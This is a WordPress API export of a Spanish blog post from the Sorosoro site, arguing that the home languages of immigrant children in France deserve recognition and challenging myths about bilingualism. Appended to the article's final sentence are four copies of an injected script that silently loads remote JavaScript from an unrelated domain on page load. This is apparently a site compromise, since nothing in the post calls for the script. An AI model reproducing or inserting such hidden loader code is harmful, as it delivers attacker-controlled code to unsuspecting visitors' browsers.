{"id":66762,"date":"2015-09-04T23:31:38","date_gmt":"2015-09-04T21:31:38","guid":{"rendered":"http:\/\/www.sorosoro.org\/?p=66762"},"modified":"2025-10-21T21:59:05","modified_gmt":"2025-10-21T19:59:05","slug":"defensa-en-favor-el-plurilinguismo-de-los-ninos-nacidos-de-la-inmigracion","status":"publish","type":"post","link":"https:\/\/www.sorosoro.org\/es\/2015\/09\/defensa-en-favor-el-plurilinguismo-de-los-ninos-nacidos-de-la-inmigracion\/","title":{"rendered":"Defensa en favor el plurilinguismo de los ni\u00f1os nacidos de la inmigraci\u00f3n"},"content":{"rendered":"<p><span style=\"font-size:12px\">Publicado por Barbara Abdelilah-Bauer el January 16, 2011<\/span><br \/>\n&nbsp;<br \/>\n<img decoding=\"async\" class=\" size-full wp-image-2549 alignleft\" title=\"Barbara Abdelilah-Bauer\"  src=\"\/wp-content\/uploads\/bfinal-e1440702170865.jpg\" alt=\"Barbara Abdelilah-Bauer\" width=\"150\" height=\"auto\" \/><br \/>\n<em>Por Barbara Abdelilah-Bauer, autor del \u201d Desaf\u00edo de los ni\u00f1os biling\u00fces. Crecer y vivir hablando varias lenguas \u201c, La D\u00e9couverte, 2008<br \/>\n<a href=\"http:\/\/www.enfantsbilingues.com\" target=\"_blank\">www.enfantsbilingues.com<\/a><\/em><br \/>\n&nbsp;<br \/>\n&nbsp;<br \/>\n&nbsp;<br \/>\n&nbsp;<br \/>\n&nbsp;<br \/>\nHablar varias lenguas extranjeras es una ventaja innegable en toda Europa y poseer por lo menos una mas aparte de la lengua materna se ha convertido en una obligaci\u00f3n. A partir de ahora, la opini\u00f3n p\u00fablica reconoce que el dominio de una lengua prestigiosa como el ingl\u00e9s es un ideal que hay que alcanzar, pero <strong>\u00bfqu\u00e9 hay unas lenguas nacidas de la inmigraci\u00f3n?<\/strong><\/p>\n<p>En Francia, las guarder\u00edas infantiles y las escuelas acogen a un n\u00famero importante de ni\u00f1os cuya lengua materna no es el franc\u00e9s. A pesar de este potencial ling\u00fc\u00edstico importante (cerca de 200 lenguas son habladas en este pa\u00eds gracias a las migraciones), el biling\u00fcismo suscita en este marco tantos temores como entusiasmo. Es evidente que los repertorios pluriling\u00fces de los ni\u00f1os nacidos de la inmigraci\u00f3n son desvalorizados, incluso rechazados, so pretexto de una supuesta \u201cdiscapacidad ling\u00fc\u00edstica\u201d. <strong>A menos que se hable una lengua socialmente valorizada, todo padre no franc\u00f3fono es expuesto en realidad a los estereotipos negativos que atav\u00edan su lengua y su cultura de origen.<\/strong><\/p>\n<p>Verdaderos mitos persisten en la sociedad francesa a prop\u00f3sito de un cierto biling\u00fcismo:<\/p>\n<p>En primer lugar, seg\u00fan una creencia difundida entre los profesionales de la educaci\u00f3n, <strong>el tiempo que pasa un ni\u00f1o estudiando su lengua de origen seria tiempo perdido para aprender el franc\u00e9s<\/strong>, la \u00fanica lengua necesaria para alcanzar el \u00e9xito escolar. S\u00f3lo la inmersi\u00f3n total en franc\u00e9s \u2013 en familia y en la escuela \u2013 garantizar\u00eda un r\u00e1pido aprendizaje. La pr\u00e1ctica de la lengua materna impedir\u00eda, en cuanto a ella, el desarrollo del franc\u00e9s y tendr\u00eda por el resultado que el ni\u00f1o no hable ninguna lengua correctamente. No ser\u00eda biling\u00fce, sino \u201csemiling\u00fce\u201d. Y a pesar de numerosos estudios recientes que demuestran que la supuesta discapacidad ling\u00fc\u00edstica que lleva hacia el \u201csemiling\u00fcismo\u201d es claramente el resultado de circunstancias extremas de privaci\u00f3n, las ideas antiguas desaparecen dif\u00edcilmente.<\/p>\n<p>Despu\u00e9s tambi\u00e9n encontramos, en el pa\u00eds del monoling\u00fcismo, la teor\u00eda muy ingenua seg\u00fan la cual el cerebro est\u00e1 creado para desarrollar una sola lengua a la vez, y que <strong>la adquisici\u00f3n simult\u00e1nea de dos lenguas representa una sobrecarga para \u00e9ste.<\/strong> Sabemos sin embargo que el cerebro es completamente capaz de tratar y memorizar varios sistemas ling\u00fc\u00edsticos a la vez, aunque ciertos investigadores sostienen hoy, al contrario, que el cerebro humano est\u00e1 creado para ser pluriling\u00fce.<\/p>\n<p>Y el resultado est\u00e1 all\u00ed: <strong>todos estos mitos \u201cjustifican\u201d los consejos dados a los padres no franc\u00f3fonos de que abandonen la lengua materna familiar en favor de franc\u00e9s.<\/strong><br \/>\nPero eso significa desconocer el impacto de la herencia ling\u00fc\u00edstica y cultural sobre el bienestar ps\u00edquico del ni\u00f1o y de su familia.<\/p>\n<p>Hablando con su ni\u00f1o, una madre transmite el saber ling\u00fc\u00edstico universal y el saber ling\u00fc\u00edstico espec\u00edfico. <strong>El ni\u00f1o necesita poder situarse con relaci\u00f3n a la historia de sus padres, su lengua y su cultura. Necesita el conocimiento y el reconocimiento de la lengua de sus padres.<\/strong><\/p>\n<p>Lo que es m\u00e1s, la inmersi\u00f3n precoz en la lengua segunda a costa de la lengua materna estigmatiza, provoca competencias menores en lengua segunda, como ha sido demostrado en numerosos estudios. Hoy est\u00e1 admitido que <strong>s\u00f3lo los programas de ense\u00f1anza que les permiten a los alumnos desarrollar sus competencias en lengua materna al mismo tiempo que aprenden la lengua de escolarizaci\u00f3n tienen efectos positivos sobre el aprendizaje de esta \u00faltima.<\/strong><\/p>\n<p>Mientras no se haya reconocido el valor de toda lengua hablada en las familias como elemento estructurante de la identidad del ni\u00f1o, mientras las pol\u00edticas educativas no hayan tomado consciencia de la suerte que constituye la presencia de tantas lenguas vivas para dar ventajas suplementarias a los j\u00f3venes alumnos \u201d nacidos de la inmigraci\u00f3n \u201c, millares de ni\u00f1os tendr\u00e1n prohibido el biling\u00fcismo o el plurilinguismo, y los estereotipos continuar\u00e1n haciendo la vida imposible a quienquiera que intente promover el plurilinguismo en Francia<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Publicado por Barbara Abdelilah-Bauer el January 16, 2011 &nbsp; Por Barbara Abdelilah-Bauer, autor del \u201d Desaf\u00edo de los ni\u00f1os biling\u00fces. Crecer y vivir hablando varias lenguas \u201c, La D\u00e9couverte, 2008 www.enfantsbilingues.com &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Hablar varias lenguas extranjeras es una ventaja innegable en toda Europa y poseer por lo menos una mas aparte [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-66762","post","type-post","status-publish","format-standard","hentry","category-otro"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Defensa en favor el plurilinguismo de los ni\u00f1os nacidos de la inmigraci\u00f3n - Sorosoro<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.sorosoro.org\/es\/2015\/09\/defensa-en-favor-el-plurilinguismo-de-los-ninos-nacidos-de-la-inmigracion\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Defensa en favor el plurilinguismo de los ni\u00f1os nacidos de la inmigraci\u00f3n - Sorosoro\" \/>\n<meta property=\"og:description\" content=\"Publicado por Barbara Abdelilah-Bauer el January 16, 2011 &nbsp; Por Barbara Abdelilah-Bauer, autor del \u201d Desaf\u00edo de los ni\u00f1os biling\u00fces. Crecer y vivir hablando varias lenguas \u201c, La D\u00e9couverte, 2008 www.enfantsbilingues.com &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Hablar varias lenguas extranjeras es una ventaja innegable en toda Europa y poseer por lo menos una mas aparte [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.sorosoro.org\/es\/2015\/09\/defensa-en-favor-el-plurilinguismo-de-los-ninos-nacidos-de-la-inmigracion\/\" \/>\n<meta property=\"og:site_name\" content=\"Sorosoro\" \/>\n<meta property=\"article:published_time\" content=\"2015-09-04T21:31:38+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T19:59:05+00:00\" \/>\n<meta name=\"author\" content=\"Sorosoro\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Sorosoro\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2015\/09\/defensa-en-favor-el-plurilinguismo-de-los-ninos-nacidos-de-la-inmigracion\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2015\/09\/defensa-en-favor-el-plurilinguismo-de-los-ninos-nacidos-de-la-inmigracion\/\"},\"author\":{\"name\":\"Sorosoro\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/a457def540d2d426a1f19547404f1917\"},\"headline\":\"Defensa en favor el plurilinguismo de los ni\u00f1os nacidos de la inmigraci\u00f3n\",\"datePublished\":\"2015-09-04T21:31:38+00:00\",\"dateModified\":\"2025-10-21T19:59:05+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2015\/09\/defensa-en-favor-el-plurilinguismo-de-los-ninos-nacidos-de-la-inmigracion\/\"},\"wordCount\":750,\"articleSection\":[\"Otro\"],\"inLanguage\":\"es\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2015\/09\/defensa-en-favor-el-plurilinguismo-de-los-ninos-nacidos-de-la-inmigracion\/\",\"url\":\"https:\/\/www.sorosoro.org\/es\/2015\/09\/defensa-en-favor-el-plurilinguismo-de-los-ninos-nacidos-de-la-inmigracion\/\",\"name\":\"Defensa en favor el plurilinguismo de los ni\u00f1os nacidos de la inmigraci\u00f3n - Sorosoro\",\"isPartOf\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/#website\"},\"datePublished\":\"2015-09-04T21:31:38+00:00\",\"dateModified\":\"2025-10-21T19:59:05+00:00\",\"author\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/a457def540d2d426a1f19547404f1917\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2015\/09\/defensa-en-favor-el-plurilinguismo-de-los-ninos-nacidos-de-la-inmigracion\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.sorosoro.org\/es\/2015\/09\/defensa-en-favor-el-plurilinguismo-de-los-ninos-nacidos-de-la-inmigracion\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2015\/09\/defensa-en-favor-el-plurilinguismo-de-los-ninos-nacidos-de-la-inmigracion\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.sorosoro.org\/es\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Defensa en favor el plurilinguismo de los ni\u00f1os nacidos de la inmigraci\u00f3n\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/#website\",\"url\":\"https:\/\/www.sorosoro.org\/es\/\",\"name\":\"Sorosoro\",\"description\":\"Pour que vivent les langues du monde !\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.sorosoro.org\/es\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/a457def540d2d426a1f19547404f1917\",\"name\":\"Sorosoro\",\"url\":\"https:\/\/www.sorosoro.org\/es\/author\/admin\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Defensa en favor el plurilinguismo de los ni\u00f1os nacidos de la inmigraci\u00f3n - Sorosoro","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.sorosoro.org\/es\/2015\/09\/defensa-en-favor-el-plurilinguismo-de-los-ninos-nacidos-de-la-inmigracion\/","og_locale":"es_ES","og_type":"article","og_title":"Defensa en favor el plurilinguismo de los ni\u00f1os nacidos de la inmigraci\u00f3n - Sorosoro","og_description":"Publicado por Barbara Abdelilah-Bauer el January 16, 2011 &nbsp; Por Barbara Abdelilah-Bauer, autor del \u201d Desaf\u00edo de los ni\u00f1os biling\u00fces. Crecer y vivir hablando varias lenguas \u201c, La D\u00e9couverte, 2008 www.enfantsbilingues.com &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Hablar varias lenguas extranjeras es una ventaja innegable en toda Europa y poseer por lo menos una mas aparte [&hellip;]","og_url":"https:\/\/www.sorosoro.org\/es\/2015\/09\/defensa-en-favor-el-plurilinguismo-de-los-ninos-nacidos-de-la-inmigracion\/","og_site_name":"Sorosoro","article_published_time":"2015-09-04T21:31:38+00:00","article_modified_time":"2025-10-21T19:59:05+00:00","author":"Sorosoro","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Sorosoro","Tiempo de lectura":"4 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.sorosoro.org\/es\/2015\/09\/defensa-en-favor-el-plurilinguismo-de-los-ninos-nacidos-de-la-inmigracion\/#article","isPartOf":{"@id":"https:\/\/www.sorosoro.org\/es\/2015\/09\/defensa-en-favor-el-plurilinguismo-de-los-ninos-nacidos-de-la-inmigracion\/"},"author":{"name":"Sorosoro","@id":"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/a457def540d2d426a1f19547404f1917"},"headline":"Defensa en favor el plurilinguismo de los ni\u00f1os nacidos de la inmigraci\u00f3n","datePublished":"2015-09-04T21:31:38+00:00","dateModified":"2025-10-21T19:59:05+00:00","mainEntityOfPage":{"@id":"https:\/\/www.sorosoro.org\/es\/2015\/09\/defensa-en-favor-el-plurilinguismo-de-los-ninos-nacidos-de-la-inmigracion\/"},"wordCount":750,"articleSection":["Otro"],"inLanguage":"es"},{"@type":"WebPage","@id":"https:\/\/www.sorosoro.org\/es\/2015\/09\/defensa-en-favor-el-plurilinguismo-de-los-ninos-nacidos-de-la-inmigracion\/","url":"https:\/\/www.sorosoro.org\/es\/2015\/09\/defensa-en-favor-el-plurilinguismo-de-los-ninos-nacidos-de-la-inmigracion\/","name":"Defensa en favor el plurilinguismo de los ni\u00f1os nacidos de la inmigraci\u00f3n - Sorosoro","isPartOf":{"@id":"https:\/\/www.sorosoro.org\/es\/#website"},"datePublished":"2015-09-04T21:31:38+00:00","dateModified":"2025-10-21T19:59:05+00:00","author":{"@id":"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/a457def540d2d426a1f19547404f1917"},"breadcrumb":{"@id":"https:\/\/www.sorosoro.org\/es\/2015\/09\/defensa-en-favor-el-plurilinguismo-de-los-ninos-nacidos-de-la-inmigracion\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.sorosoro.org\/es\/2015\/09\/defensa-en-favor-el-plurilinguismo-de-los-ninos-nacidos-de-la-inmigracion\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.sorosoro.org\/es\/2015\/09\/defensa-en-favor-el-plurilinguismo-de-los-ninos-nacidos-de-la-inmigracion\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.sorosoro.org\/es\/"},{"@type":"ListItem","position":2,"name":"Defensa en favor el plurilinguismo de los ni\u00f1os nacidos de la inmigraci\u00f3n"}]},{"@type":"WebSite","@id":"https:\/\/www.sorosoro.org\/es\/#website","url":"https:\/\/www.sorosoro.org\/es\/","name":"Sorosoro","description":"Pour que vivent les langues du monde !","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.sorosoro.org\/es\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Person","@id":"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/a457def540d2d426a1f19547404f1917","name":"Sorosoro","url":"https:\/\/www.sorosoro.org\/es\/author\/admin\/"}]}},"_links":{"self":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/posts\/66762","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/comments?post=66762"}],"version-history":[{"count":0,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/posts\/66762\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/media?parent=66762"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/categories?post=66762"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/tags?post=66762"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}